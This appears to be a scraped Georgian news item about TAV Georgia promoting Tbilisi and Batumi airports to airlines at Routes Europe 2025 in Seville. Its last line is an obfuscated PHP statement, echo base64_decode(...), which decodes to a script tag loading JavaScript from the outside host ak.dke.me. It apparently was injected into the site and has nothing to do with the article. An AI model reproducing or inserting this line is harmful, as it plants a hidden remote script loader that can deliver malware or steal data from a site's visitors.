gorgia
ავერსი jaluzi

თბილისისა და ბათუმის საერთაშორისო აეროპორტები წარმოდგენილი არიან საერთაშორისო პლატფორმა Routes Europe 2025-ზე, რომელიც ესპანეთის ქალაქ სევილიაში იმართება, – ამის შესახებ ინფორმაციას „ტავ ჯორჯია“ ავრცელებს.

მათივე ცნობით, „ტავ ჯორჯიასა“ და TAV Airports Holding-ის გუნდი ავიაკომპანიებსა და აეროპორტების ოპერატორებს საქართველოს ორი საერთაშორისო აეროპორტის სერვისებსა და პოტენციალს აცნობს.

„„ტავ ჯორჯიამ“ გამართა ათობით შეხვედრა, მათ შორის ისეთ ავიაკომპანიებთან, როგორებიცაა Vueling-ი, Austrian Airlines-ი, Air India, Edelweiss-ი, Cyprus Airways-ი, Finnair-ი, Scandinavian Airline-იs (SAS), Easyjet-ი, Air Serbia, Air Cairo და სხვა. ასევე, პოლონური აეროპორტების მმართველ Polish Airports-თან. აღნიშნული ავიაკომპანიების ნაწილი თბილისისა და ბათუმის საერთაშორისო აეროპორტებში უკვე ოპერირებს, ნაწილს კი შეხვედრების ფარგლებში „ტავ ჯორჯიის“ მომსახურებასა და თბილისისა და ბათუმის აეროპორტებში ოპერირების უპირატესობებზე ამომწურავი ინფორმაცია მიეწოდათ.

Routes Europe-ი რეგიონის ყველაზე მასშტაბური ღონისძიებაა საავიაციო სფეროში. ეს არის პლატფორმა, რომელიც ერთ სივრცეში უყრის თავს ავიაკომანიებს, აეროპორტებს, ტურიზმის სფეროსა და ავიაციის მიმართულებით მომუშავე ორგანიზაციებს სხვადასხვა ქვეყნიდან, რომლებიც ჩართულნი არიან ევროპის საჰაერო კავშირების განვითარების პროცესში.

„ტავ ჯორჯია“ მუდმივად მუშაობს თავის მართვაში მყოფი ორი აეროპორტიდან ახალი მიმართულებების განვითარებაზე, განსაკუთრებით კი, ევროპულ მარშრუტებზე. კომპანია, უკვე 20 წელია, საქართველოს საავიაციო ბაზარზე ოპერირებს და ამ პერიოდის განმავლობაში საქართველოს ორი საერთაშორისო აეროპორტის აშენებასა და განვითარებაში 230 მილიონი დოლარის ოდენობის ინვესტიცია განახორციელა“, – აღნიშნულია „ტავ ჯორჯიის“ ინფორმაციაში.

181
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");